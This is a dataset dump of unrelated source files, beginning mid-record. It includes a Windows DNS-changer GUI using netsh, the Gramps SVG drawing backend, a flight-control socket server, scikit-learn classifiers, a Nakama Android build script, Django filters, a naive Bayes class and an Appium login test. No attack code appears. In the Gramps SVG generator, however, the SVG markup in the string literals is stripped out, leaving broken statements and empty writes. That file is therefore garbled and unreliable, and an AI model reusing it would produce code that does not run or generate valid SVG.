line[line.find('adapter') + len('adapter'):-2].strip() \n\t\t\t\tself._listbox.insert(END, item)\n\t\t\t\tself._list.append(item)\n\t\tself._listbox.config(state='disabled')\n\t\tself._progress[\"value\"] = 0\n\t\tself._progress[\"maximum\"] = len(self._list)\n\n\tdef changeNetworkInterfacesDNS(self, dns):\n\t\tself._button1.config(state='disabled')\n\t\tself._button2.config(state='disabled')\n\t\tself.clean()\n\t\tfor i, item in enumerate(self._list):\n\t\t\tcommand = \"netsh interface ip set dnsservers name=\\\"\" + item + \"\\\" static \" + dns + \"\\n\"\n\t\t\tprocess = Popen('cmd', shell=True, stdin=PIPE, stdout=PIPE)\n\t\t\t#out, err = process.communicate('netsh interface ip set dnsservers name=\\\"Bluetooth Network Connection\\\" static ' + dns + '\\n')\n\t\t\tout, err = process.communicate(command)\n\t\t\tself.log(out)\n\t\t\tself._progress[\"value\"] = i + 1\n\t\t\troot.update()\n\t\tself._button1.config(state='normal')\n\t\tself._button2.config(state='normal')\n\n\tdef changeDNSCallback1(self):\n\t\tdns = self._entry1.get()\n\t\tself.changeNetworkInterfacesDNS(dns)\n\n\tdef changeDNSCallback2(self):\n\t\tdns = self._entry2.get()\n\t\tself.changeNetworkInterfacesDNS(dns)\n\nif __name__ == \"__main__\":\n\troot= Tk();\n\n\tDNSChanger(root)\n\n\troot.mainloop()","sub_path":"10_DNSChanger/src/DNSChanger.pyw","file_name":"DNSChanger.pyw","file_ext":"pyw","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"462757858","text":"#\n# Gramps - a GTK+/GNOME based genealogy program\n#\n# Copyright (C) 2000-2006 Donald N. Allingham\n# Copyright (C) 2007-2009 Brian G. Matherly\n# Copyright (C) 2010 Jakim Friant\n# Copyright (C) 2013 Paul Franklin\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\"\"\"\nSVG document generator.\n\"\"\"\n\n#-------------------------------------------------------------------------\n#\n# python modules\n#\n#-------------------------------------------------------------------------\nimport sys\nif sys.version_info[0] < 3:\n from StringIO import StringIO\nelse:\n from io import StringIO\n\n#-------------------------------------------------------------------------\n#\n# Gramps modules\n#\n#-------------------------------------------------------------------------\nfrom gramps.gen.const import GRAMPS_LOCALE as glocale\n_ = glocale.translation.gettext\nfrom gramps.gen.plug.docgen import BaseDoc, DrawDoc, SOLID, FONT_SANS_SERIF\nfrom gramps.gen.errors import ReportError\nfrom gramps.gen.plug.menu import EnumeratedListOption\nfrom gramps.gen.plug.report import DocOptions\n\n#-------------------------------------------------------------------------\n#\n# SvgDrawDoc\n#\n#-------------------------------------------------------------------------\nclass SvgDrawDoc(BaseDoc, DrawDoc):\n\n def __init__(self, styles, type, options=None):\n BaseDoc.__init__(self, styles, type)\n self.f = None\n self.filename = None\n self.level = 0\n self.time = \"0000-00-00T00:00:00\"\n self.page = 0\n\n self._bg = 'none' # SVG background, in case options are ignored\n if options:\n menu = options.menu\n self._bg = menu.get_option_by_name('svg_background').get_value()\n if self._bg == 'transparent':\n self._bg = 'none'\n\n def open(self, filename):\n if filename[-4:] != \".svg\":\n self.root = filename\n else:\n self.root = filename[:-4]\n\n def close(self):\n pass\n\n def start_page(self):\n self.page += 1\n if self.page != 1:\n name = \"%s-%d.svg\" % (self.root, self.page)\n else:\n name = \"%s.svg\" % self.root\n\n try:\n self.f = open(name,\"w\")\n except IOError as msg:\n raise ReportError(_(\"Could not create %s\") % name, msg)\n except:\n raise ReportError(_(\"Could not create %s\") % name)\n \n self.t = StringIO()\n \n width = self.paper.get_size().get_width()\n height = self.paper.get_size().get_height()\n\n self.f.write(\n '\\n'\n '\\n'\n '\\n'\n '\\n'\n % (width, height, width, height, self._bg)\n )\n\n def rotate_text(self, style, text, x, y, angle, mark=None):\n \"\"\" @param mark: IndexMark to use for indexing (not supported) \"\"\"\n style_sheet = self.get_style_sheet()\n stype = style_sheet.get_draw_style(style)\n pname = stype.get_paragraph_style()\n p = style_sheet.get_paragraph_style(pname)\n font = p.get_font()\n size = font.get_size()\n\n width = height = 0\n for line in text:\n width = max(width, self.string_width(font, line))\n height += size\n\n centerx, centery = units(( x+self.paper.get_left_margin(),\n y+self.paper.get_top_margin() ))\n xpos = (centerx - (width/2.0)) \n ypos = (centery - (height/2.0)) \n\n self.t.write(\n '')\n \n for line in text:\n # Center this line relative to the rest of the text\n linex = xpos + (width - self.string_width(font, line) ) / 2\n self.t.write(\n '' % (linex, size) +\n line +\n ''\n )\n self.t.write('\\n')\n \n def end_page(self):\n # Print the text last for each page so that it is rendered on top of \n # other graphic elements.\n self.f.write(self.t.getvalue())\n self.t.close()\n self.f.write('\\n')\n self.f.close()\n \n def draw_line(self, style, x1, y1, x2, y2):\n x1 += self.paper.get_left_margin()\n x2 += self.paper.get_left_margin()\n y1 += self.paper.get_top_margin()\n y2 += self.paper.get_top_margin()\n\n style_sheet = self.get_style_sheet()\n s = style_sheet.get_draw_style(style)\n\n line_out = '\\n')\n\n def draw_box(self, style, text, x, y, w, h, mark=None):\n \"\"\" @param mark: IndexMark to use for indexing (not supported) \"\"\"\n x += self.paper.get_left_margin()\n y += self.paper.get_top_margin()\n\n style_sheet = self.get_style_sheet()\n box_style = style_sheet.get_draw_style(style)\n\n if box_style.get_shadow():\n self.f.write(\n '\\n'\n )\n\n line_out = '' +\n line +\n '\\n'\n )\n\n def draw_text(self, style, text, x, y, mark=None):\n \"\"\" @param mark: IndexMark to use for indexing (not supported) \"\"\"\n x += self.paper.get_left_margin()\n y += self.paper.get_top_margin()\n \n style_sheet = self.get_style_sheet()\n box_style = style_sheet.get_draw_style(style)\n para_name = box_style.get_paragraph_style()\n p = style_sheet.get_paragraph_style(para_name)\n \n font = p.get_font()\n font_size = font.get_size()\n fs = (font_size/28.35) * 1.2\n self.t.write(\n '' +\n text +\n '\\n'\n )\n\n def center_text(self, style, text, x, y, mark=None):\n \"\"\" @param mark: IndexMark to use for indexing (not supported) \"\"\"\n style_sheet = self.get_style_sheet()\n box_style = style_sheet.get_draw_style(style)\n para_name = box_style.get_paragraph_style()\n p = style_sheet.get_paragraph_style(para_name)\n font = p.get_font()\n width = self.string_width(font, text) / 72\n x -= width\n self.draw_text(style, text, x, y)\n\ndef units(val):\n return (val[0]*35.433, val[1]*35.433)\n\n#------------------------------------------------------------------------\n#\n# SvgDrawDocOptions class\n#\n#------------------------------------------------------------------------\nclass SvgDrawDocOptions(DocOptions):\n \"\"\"\n Defines options and provides handling interface.\n \"\"\"\n\n def __init__(self, name, dbase):\n DocOptions.__init__(self, name)\n \n def add_menu_options(self, menu):\n \"\"\"\n Add options to the document menu for the docgen.\n \"\"\"\n category_name = 'Document Options' # internal name: don't translate\n\n background = EnumeratedListOption(_('SVG background color'),\n 'transparent')\n background.set_items([('transparent', _('transparent background')),\n ('white', _('white')),\n ('black', _('black')),\n ('red', _('red')),\n ('green', _('green')),\n ('blue', _('blue')),\n ('cyan', _('cyan')),\n ('magenta', _('magenta')),\n ('yellow', _('yellow')) ])\n background.set_help(_('The color, if any, of the SVG background'))\n menu.add_option(category_name, 'svg_background', background)\n","sub_path":"plugins/docgen/svgdrawdoc.py","file_name":"svgdrawdoc.py","file_ext":"py","file_size_in_byte":13274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"395086011","text":"import socket\nimport time\nimport logging\nimport serial, time, struct\nfrom WiiProxy import MultiWii\nfrom time import sleep\n\nfrom .gamepad import Controller\n\nHEADERSIZE = 25\n# ==================================\nclass FlightControlServer:\n # ==================================\n def __init__(self, host='192.168.2.107', port=2234):\n\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.s.bind((host, port))\n self.s.listen(3)\n\n self.multiwii = Controller()\n\n # ==================================\n def start(self):\n\n print(\"Starting flight controller\")\n self.multiwii.start()\n\n\n while True:\n # now our endpoint knows about the OTHER endpoint.\n clientsocket, address = self.s.accept()\n print(f\"Connection from {address} has been established.\")\n\n while True:\n msg = self.multiwii.getState()\n msg = f\"{len(msg):<{HEADERSIZE}}\"+msg\n clientsocket.send(bytes(msg,\"utf-8\"))\n time.sleep(0.1)\n","sub_path":"code/quadagent/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"62157553","text":"import pandas as pd\n\n#Faz o pre processamento dos dados\nbase = pd.read_csv('credit_data.csv')\n#Corrige o valor da idade negativa\nbase.loc[base.age < 0, 'age'] = 40.92\n \n#Divide em previsores e a classe\nprevisores = base.iloc[:, 1:4].values\nclasse = base.iloc[:, 4].values\n\n#Faz a correção dos valores faltantes\nfrom sklearn.preprocessing import Imputer\nimputer = Imputer(missing_values = 'NaN', strategy = 'mean', axis = 0)\nimputer = imputer.fit(previsores[:, 1:4])\nprevisores[:, 1:4] = imputer.transform(previsores[:, 1:4])\n\n#Escalonamento\nfrom sklearn.preprocessing import StandardScaler\nscaler = StandardScaler()\nprevisores = scaler.fit_transform(previsores)\n\n#Divide a base de dados em treinamento e teste\nfrom sklearn.model_selection import train_test_split\nprevisores_treinamento, previsores_teste, classe_treinamento, classe_teste = train_test_split(previsores, classe, test_size=0.25, random_state=0)\n\n\n#Pre processamento da rede neural\nfrom sklearn.neural_network import MLPClassifier\n#Faz o treinamento na rede neural\nclassificador = MLPClassifier(verbose = True,\n max_iter=1000,\n tol = 0.0000010,\n solver = 'adam',\n hidden_layer_sizes=(100),\n activation='relu')\nclassificador.fit(previsores_treinamento, classe_treinamento)\nprevisoes = classificador.predict(previsores_teste)\n\n#Mostra o resultado e a matriz com erros e acertos\nfrom sklearn.metrics import confusion_matrix, accuracy_score\nprecisao = accuracy_score(classe_teste, previsoes)\nmatriz = confusion_matrix(classe_teste, previsoes)","sub_path":"Classification/Artificial neural networks/redes_neurais_credit_data.py","file_name":"redes_neurais_credit_data.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"191129850","text":"import numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nfrom sklearn.base import clone\nfrom sklearn.ensemble import RandomForestClassifier\nfrom keras.datasets import fashion_mnist\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.metrics import precision_score, recall_score, f1_score, accuracy_score, confusion_matrix, roc_auc_score\n\n\n# Load & preprocessing\n(train_images, train_labels), (test_images, test_labels) = tf.keras.datasets.fashion_mnist.load_data()\nlabels = ['Dress','Trousers','Pull','Dress2','Coat','Heels','Sweater','Shoes','Other','Boot']\n\nim_shape = train_images.shape\ntrain_images = train_images.reshape(60000,im_shape[1]*im_shape[2])\ntest_images = test_images.reshape(10000,im_shape[1]*im_shape[2])\n\nscaler = StandardScaler()\ntrain_images = scaler.fit_transform(train_images.astype('float32'))\ntest_images = scaler.fit_transform(test_images.astype('float32'))\n\n# Data exploration\n# for i in range(10):\n# plt.imshow(train_images[i])\n# plt.title(labels[train_labels[i]])\n# plt.axis('off')\n# plt.show()\n\n# print('Train images shape:', train_images.shape)\n# print('Test images shape:', test_images.shape)\n# print('Train labels shape:', train_labels.shape)\n# print('Test label shape:', train_labels.shape)\n\nmodel_set = [\n SGDClassifier(max_iter=100),\n RandomForestClassifier()\n]\nmodel_index = 0\n\nskf = StratifiedKFold(n_splits=3, random_state=42, shuffle=True)\n\nfor model in model_set:\n matrix = []\n accuracy = []\n precision = []\n recall = []\n f1 = []\n roc = []\n \n for train_index, test_index in skf.split(train_images, train_labels): \n x_train_fold = train_images[train_index]\n y_train_fold = train_labels[train_index]\n x_test_fold = train_images[test_index]\n y_test_fold = train_labels[test_index]\n \n # clone_clf.fit(x_train_fold, y_train_fold) #whats the benefit of cloning ?\n \n model.fit(x_train_fold, y_train_fold)\n y_pred_fold = model.predict(x_test_fold)\n \n matrix.append(confusion_matrix(y_test_fold, y_pred_fold))\n accuracy.append(accuracy_score(y_test_fold, y_pred_fold))\n precision.append(precision_score(y_test_fold, y_pred_fold, average='weighted')) # what are the different average method and their effect on the score\n recall.append(recall_score(y_test_fold, y_pred_fold, average='weighted'))\n f1.append(f1_score(y_test_fold, y_pred_fold, average='weighted'))\n # roc.append(roc_auc_score(y_test_fold, y_pred_fold, average='weighted'))\n \n print(model_set[model_index])\n model_index+=1\n print('Accuracy:', round(np.average(accuracy), 2)*100, '%')\n print('Precision:', round(np.average(precision), 2)*100, '%')\n print('Recall:', round(np.average(recall), 2)*100, '%')\n # print('ROC score:', round(np.average(roc), 2)*100, '%')\n print('Matrix:', matrix[0]) #average the different matrix\n plt.matshow(matrix[0])\n plt.show()\n row_sum = matrix[0].sum(axis=1, keepdims=True)\n matrix_absolute = matrix[0]/row_sum\n plt.matshow(matrix_absolute)\n plt.show()\n\n# what are the different scoring classifiers vs non scoring classifier\n# what about the recision recall tradoff in multiclass problems ? We cant move a treshold when the classes are mutually exclusive...","sub_path":"3. Classification/classification_mnist.py","file_name":"classification_mnist.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"578789305","text":"#!/usr/bin/env python\n#\n# Copyright 2019 The Nakama Authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport sys\nimport subprocess\nimport os\n\nif len(sys.argv) < 2:\n print(\"Pass ABI parameter.\")\n print(\"e.g. armeabi-v7a, arm64-v8a or x86\")\n sys.exit(-1)\n\nABI = sys.argv[1]\nBUILD_MODE = 'Release'\n\ndef getEnvVar(name):\n if name in os.environ:\n return os.environ[name]\n return ''\n\nANDROID_NDK = getEnvVar('ANDROID_NDK')\nif not ANDROID_NDK:\n ANDROID_NDK = getEnvVar('NDK_ROOT')\n if not ANDROID_NDK:\n print(\"Error: no ANDROID_NDK or NDK_ROOT environment variable\")\n sys.exit(-1)\n\ndef call(command):\n res = subprocess.call(command, shell=False)\n if res != 0:\n sys.exit(-1)\n\nbuild_dir = os.path.abspath('build/' + ABI + '/' + BUILD_MODE)\n\ndef makedirs(dir):\n if not os.path.isdir(dir):\n os.makedirs(dir)\n\nprint('ANDROID_NDK=' + ANDROID_NDK)\n\nmakedirs(build_dir)\n\ncmake_args = [\n 'cmake',\n '-DANDROID_ABI=' + ABI,\n '-DCMAKE_TOOLCHAIN_FILE=' + ANDROID_NDK + '/build/cmake/android.toolchain.cmake',\n '-DCMAKE_BUILD_TYPE=' + BUILD_MODE,\n '-DANDROID_NATIVE_API_LEVEL=16',\n '-B',\n build_dir,\n '-GNinja',\n '../..'\n ]\n\n# generate projects\ncall(cmake_args)\n\n# build\ncall(['ninja', '-C', build_dir, 'nakama-cmake-client-example'])\n","sub_path":"examples/nakama-cmake-client-example/build/android/build_android.py","file_name":"build_android.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"450318932","text":"\nfrom extratos.models import *\n\n\n\nfrom django import template\n\nregister = template.Library()\n\ndef checkCC(value):\n\treturn value.filter(cod_imovel = None)\n\ndef soma(lancamentos,arg):\n\tsoma = 0\n\tlancamentos = lancamentos.filter(cod_imovel = arg)\n\tfor lancamento in lancamentos:\n\t\tif lancamento.credito:\n\t\t\tsoma+=lancamento.valor\n\t\telse:\n\t\t\tsoma-=lancamento.valor\n\treturn soma\n\ndef somatotal(lancamentos,arg):\n\tsoma = arg\n\tfor lancamento in lancamentos:\n\t\tif lancamento.credito:\n\t\t\tsoma+=lancamento.valor\n\t\telse:\n\t\t\tsoma-=lancamento.valor\n\treturn soma\n\ndef locatario_imovel(locatarios,imovel):\n\treturn locatarios.filter(imovel_id = imovel)\n\ndef lancamento_locatario(lancamentos,locatario):\n\treturn lancamentos.filter(locatario_id = locatario)\n\n\n\nregister.filter('checkCC', checkCC)\nregister.filter('soma', soma)\nregister.filter('somatotal', somatotal)\nregister.filter('locatario_imovel' ,locatario_imovel)\nregister.filter('lancamento_locatario',lancamento_locatario)","sub_path":"relatorios/extratos/templatetags/extratos_extras.py","file_name":"extratos_extras.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"342335022","text":"import numpy as np\n\n\nclass MultinomialNaiveBayes():\n def __init__(self, classes, num_feat, smoothing_value=0):\n # Number of features the model uses\n self.num_feat = num_feat\n # List of the classes\n self.classes = classes\n # Dictionary mapping each class to the prior probability p(C=c)\n self.class_to_prior = {c: 0 for c in classes}\n # self.class_to_feature_to_cond_prob[c][x] is used to store the estimate of the conditional probability p(X=x|C=c)\n self.class_to_feature_to_cond_prob = {c: np.zeros((num_feat,)) for c in classes}\n # A smoothing value of 0 is equivalent to no smoothing\n self.smoothing_value = smoothing_value\n \n def fit(self, X, y):\n y = np.array(y)\n X = np.array(X)\n # Computer priors\n for c in y:\n self.class_to_prior[c] += 1\n self.class_to_prior.update({c: self.class_to_prior[c] / len(y) for c in self.classes})\n \n # Compute estimate of the conditional probability p(X=x|C=c)\n for c in self.classes:\n X_c = X[y == c]\n features_frequencies = np.sum(X_c, axis=0)\n self.class_to_feature_to_cond_prob[c] = (features_frequencies + self.smoothing_value) / sum(features_frequencies + self.smoothing_value)\n \n def predict(self, X):\n return np.argmax(np.stack([self.compute_scores(X, c) for c in self.classes], axis=-1), axis=1)\n \n def compute_scores(self, X, c):\n # If smoothing is not applied, some conditional probability will be zero and so we can't take the log of them\n if self.smoothing_value == 0:\n scores = []\n log_cond_prob = np.log(self.class_to_feature_to_cond_prob[c])\n for x in X:\n score = np.log(self.class_to_prior[c])\n for i, count in enumerate(x):\n if count != 0:\n score += log_cond_prob[i] * count\n scores.append(score)\n return scores\n \n adjusted_cond_prob = np.array([p if p != 0 else 10 ** -100 for p in self.class_to_feature_to_cond_prob[c]])\n return np.log(self.class_to_prior[c]) + np.matmul(X, np.log(adjusted_cond_prob))\n\n# def compute_score(self, x, c):\n# # Compute score (unnormalized log probability) for given class\n# return np.log(self.class_to_prior[c]) + np.dot(x, np.log(self.smooth(self.class_to_feature_to_cond_prob[c])))","sub_path":"multinomial_naive_bayes.py","file_name":"multinomial_naive_bayes.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"285092079","text":"import numpy as np\nfrom pymicro.crystal.lattice import Lattice, HklDirection, HklObject, HklPlane\nfrom pymicro.crystal.microstructure import Orientation\nfrom pymicro.xray.detectors import RegArrayDetector2d\nfrom pymicro.xray.laue import compute_Laue_pattern, compute_ellipsis, gnomonic_projection\nfrom matplotlib import pyplot as plt, cm\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\n\n# \n# name: homochoric_rep\n# @omega: rotation angle in [0,pi], n: rotation axis \n# @Xh,Yh,Zh: homochoric coordinates \n#\n \ndef homochoricRep(omega_deg,n):\n\t\n\tomega=omega_deg*np.pi/180.\n\ta=omega_deg/2.\n\tv_unit=n/np.linalg.norm(n)\n\tprint('unit vector',v_unit)\n\tt=np.cos(omega/2.)\n\tif(t>=0):\n\t\tf=((3./4.)*(omega-np.sin(omega)))**(1./3.)\n\t\t#print(f)\n\telif (t<0) and (np.abs(a-180.)>0.001):\n\t\tf=((3./4.)*(2*np.pi-omega+np.sin(omega)))**(1./3.)\n\t\t#print(f)\n\tXh=f*np.dot(v_unit,np.array([1.,0.,0.]))\n\tYh=f*np.dot(v_unit,np.array([0.,1.,0.]))\n\tZh=f*np.dot(v_unit,np.array([0.,0.,1.]))\n\tprint('Homochoric coordinate',Xh,Yh,Zh)\n\treturn Xh,Yh,Zh\n\n\n# \n# name: invHomochoricRep\n# @param: Xh,Yh,Zh: Homochoric coordinates\n# @return: omega,x,y,z\n# \ndef invHomochoricRep(Xh,Yh,Zh):\n\trho=np.sqrt(Xh**2.+Yh**2.+Zh**2.)\n\tt1=0.\n\tt_inv=0.\n\tf_inv=0.\n\ta_inv=0.\n\ta=[-0.500009615,-0.024866061,-0.004549382,0.000511867,-0.001650083,0.000759335,-0.000204042]\n#a: Series coefficients ( see numerically Modelling Simul. Mater. Sci. Eng 22(2014) )\n#page 10 \n\tfor i in range(1,8):\n\t\tt1=t1+(a[i-1]*(rho)**(2.*i))\n\tt_inv=t1+1.\n\tif (t_inv>=0.):\n\t\tomega=2.*np.arccos(t_inv)\n\t\ta_inv=(omega*180./np.pi)/2.\n\t\t#print('omega inv',omega*180/np.pi,a_inv)\n\tif (t_inv<0.):\n\t\tomega=2.*np.arccos(t_inv)\n\t\ta_inv=(omega*180./np.pi)/2.\n\t\t#print('omega inv',omega*180/np.pi,a_inv)\n\tif(t_inv>=0):\n\t\tf_inv=((3./4.)*(omega-np.sin(omega)))**(1./3.)\n\telif (t_inv<0.):\n\t\tf_inv=((3./4.)*(2*np.pi-omega+np.sin(omega)))**(1./3.)\n\tif (t_inv==1.) or (t_inv==-1.):\n\t\tf_inv=1.\n\t\n\tx_inv=Xh/f_inv\n\ty_inv=Yh/f_inv\n\tz_inv=Zh/f_inv\n\treturn a_inv*2.,x_inv,y_inv,z_inv\n\n\ndef cuboToHomochoric(xc,yc,zc):\n\t#step 1\n\tc=np.array([xc,yc,zc])\n\tc_prim=((np.pi/6.)**(1./6.))*c\n\tx=((np.pi/6.)**(1./6.))*xc\n\ty=((np.pi/6.)**(1./6.))*yc\n\tz=((np.pi/6.)**(1./6.))*zc\n\tfactx=0.\n\tfacty=0.\n\tY=0.\n\tX=0.\n\txh=0.\n\tyh=0.\n\tzh=0.\n\t#step 2 and 3\n\tif (y==0. and x==0. and z==0.):\n\t\txh=0.\n\t\tyh=0.\n\t\tzh=0.\n\telse:\n\t\t\n\t\tif (x==0. and y==0. and z!=0.):\n\t\t\txh=0.\n\t\t\tyh=0.\n\t\t\tzh=np.sqrt(6./np.pi)*z\n\t\t\t\n\t\telif(np.abs(y)<=np.abs(x)):\n\t\t\tfactx=((2.**0.25)*x)/(np.sqrt(np.pi/6.)*(np.sqrt(np.sqrt(2.)-np.cos((y*np.pi)/(12.*x)))))\n\t\t\tX=factx*((np.sqrt(2.)*np.cos((y*np.pi)/(12.*x)))-1.)\n\t\t\tY=factx*(np.sqrt(2.)*np.sin((y*np.pi)/(12.*x)))\n\t\t\t\n\t\t\txh=np.sqrt(1-(((X**2.+Y**2.)*np.pi)/(24.*(z**2.))))*X\n\t\t\tyh=np.sqrt(1-(((X**2.+Y**2.)*np.pi)/(24.*(z**2.))))*Y\n\t\t\tzh=(np.sqrt(6./np.pi)*z)-(((X**2.+Y**2.)*np.sqrt(np.pi))/((np.sqrt(24.)*z)))\n\t\t\t\n\t\telif (np.abs(y)>=np.abs(x) ): \n\t\t\tfacty=((2.**0.25)*y)/(np.sqrt(np.pi/6.)*np.sqrt(np.sqrt(2.)-np.cos((x*np.pi)/(12.*y))))\n\t\t\tX=facty*(np.sqrt(2.)*np.sin((x*np.pi)/(12.*y)))\n\t\t\tY=facty*((np.sqrt(2.)*np.cos((x*np.pi)/(12.*y)))-1.)\n\t\t#~ if (y==x):\n\t\t\t#~ factx=((2.**0.25)*x)/(np.sqrt(np.pi/6.)*np.sqrt(np.sqrt(2.)-np.cos((np.pi)/(12.))))\n\t\t\t#~ X=factx*((np.sqrt(2.)*np.cos((np.pi)/(12.)))-1.)\n\t\t\t#~ Y=factx*(np.sqrt(2.)*np.sin((np.pi)/(12.)))\n\t\t\t\n\t\t\txh=np.sqrt(1-(((X**2.+Y**2.)*np.pi)/(24.*(z**2.))))*X\n\t\t\tyh=np.sqrt(1-(((X**2.+Y**2.)*np.pi)/(24.*(z**2.))))*Y\n\t\t\tzh=(np.sqrt(6./np.pi)*z)-(((X**2.+Y**2.)*np.sqrt(np.pi))/((np.sqrt(24.)*z)))\n\t\t\t\n\treturn (xh,yh,zh)\n\t\n\n\n\ndef pyramideP1(hauteur,N):\n\ta=hauteur\n\tb=hauteur\n\tdelta=hauteur/(N)\n\txf=[]\n\tyf=[]\n\tzf=[]\n\tfor i in range(0,1+N):\n\t\tz=hauteur-(i*delta)\n\t\txmax=np.abs(a-(i*delta))\n\t\tymax=np.abs(b-(i*delta))\n\t\tfor j in range(0,2*N+1):\n\t\t\tx=a-(j*delta)\n\t\t\tfor k in range(0,2*N+1):\n\t\t\t\ty=b-(k*delta)\n\t\t\t\tif(np.abs(y)<=np.abs(ymax)) and(np.abs(x)<=np.abs(xmax)):\n\t\t\t\t\txf.append(x)\n\t\t\t\t\tyf.append(y)\n\t\t\t\t\tzf.append(z)\n\treturn xf,yf,zf\n\ndef pyramideP2(hauteur,N):\n\ta=hauteur\n\tb=hauteur\n\tdelta=hauteur/(N)\n\txf=[]\n\tyf=[]\n\tzf=[]\n\tfor i in range(0,N+1):\n\t\tz=(i*delta)\n\t\txmax=np.abs(a-(i*delta))\n\t\tymax=np.abs(b-(i*delta))\n\t\tfor j in range(0,2*N+1):\n\t\t\tx=a-(j*delta)\n\t\t\tfor k in range(0,2*N+1):\n\t\t\t\ty=b-(k*delta)\n\t\t\t\tif(np.abs(y)<=np.abs(ymax)) and(np.abs(x)<=np.abs(xmax)):\n\t\t\t\t\txf.append(x)\n\t\t\t\t\tyf.append(y)\n\t\t\t\t\tzf.append(z-(hauteur))\n\treturn xf,yf,zf\n\n\n\n","sub_path":"Dictionnary/utils_dic.py","file_name":"utils_dic.py","file_ext":"py","file_size_in_byte":4319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"219525671","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n\nfrom time import sleep\nfrom basis.app_basis_page import AppBasisPage\nfrom config.elelocinfo import *\nfrom config.ime import *\n\nclass AppLoginPage(AppBasisPage):\n\n\n def login(self):\n exist_first_pager = self.driver.isElementExist(first_pager)\n if exist_first_pager == True:\n self.log('开始滑动欢迎页面...')\n for i in range(4):\n self.driver.swipeLeft(600)\n self.driver.click(first_pager)\n if exist_first_pager == False:\n print(\"成功跳过欢迎页面\")\n exist_login_btn = self.driver.isElementExist(login_btn)\n if exist_login_btn == True:\n self.log('货栈登陆中...')\n os.system(ime_appium)\n self.driver.type_clear(username_id,'15965645945')\n self.driver.type_clear(password_id,'123456')\n\n self.driver.click(login_btn)\n\n if exist_login_btn == False:\n self.log(\"APP已登录,开始模拟用户场景测试\")\n\n self.log('设置允许权限')\n while True:\n exist_allow = self.driver.isElementExist(allow)\n if exist_allow == True:\n self.driver.click(allow)\n if exist_allow == False:\n self.log('权限已被设置')\n break\n sleep(2)\n\n\n def login_inherit(self, data):\n\n exist_first_pager = self.driver.isElementExist(first_pager)\n if exist_first_pager == True:\n self.log('开始滑动欢迎页面...')\n for i in range(4):\n self.driver.swipeLeft(600)\n\n self.driver.click(first_pager)\n\n if exist_first_pager == False:\n print(\"成功跳过欢迎页面\")\n sleep(1)\n exist_login_btn = self.driver.isElementExist(login_btn)\n if exist_login_btn == True:\n self.log('货栈登陆中...')\n os.system(ime_appium)\n self.driver.type_clear(username_id,data['username'] )\n self.driver.type_clear(password_id, data['password'])\n\n self.driver.click(login_btn)\n\n if exist_login_btn == False:\n print(\"APP已登录,开始模拟用户场景测试\")\n\n self.log('设置允许权限')\n while True:\n exist_allow = self.driver.isElementExist(allow)\n if exist_allow == True:\n self.driver.click(allow)\n if exist_allow == False:\n self.log('跳过权限设置')\n break\n if data['casetype'] == 'True':\n\n self.log(\"回家 - 获取登录成功的断言文本\")\n self.driver.click(home_id)\n if self.driver.isElementExist(user_name_class) ==True :\n self.SUCCESS_TEXT = self.driver.get_text(user_name_class)\n print(\"断言文本:\"+self.SUCCESS_TEXT)\n if self.driver.isElementExist(user_name_class) == False:\n print(\"断言文本未能获取\")\n exist_my = self.driver.isElementExist(home_id)\n if exist_my == True:\n self.log('登录成功,点击我的')\n self.driver.click(home_id)\n self.log(\"点击设置\")\n self.driver.click(set_id)\n self.log(\"点击退出登录按钮\")\n self.driver.click(logout_btn)\n if exist_my == False:\n self.log(\"登录失败,继续下一条测试用例\")\n\n if data['casetype'] == 'False':\n try:\n\n self.log(\"获取登录失败的断言文本\")\n self.FAIL_TEXT = self.driver.get_text(login_btn)\n self.log(\"执行登录失败用例\")\n exist_login_btn = self.driver.isElementExist(login_btn)\n if exist_login_btn == True:\n pass\n\n if exist_login_btn == False:\n self.log(\"执行错误用例退出登陆\")\n self.log('点击我的')\n self.driver.click(home_id)\n self.log(\"点击设置\")\n self.driver.click(set_id)\n self.log(\"点击退出登录按钮\")\n self.driver.click(logout_btn)\n except:\n 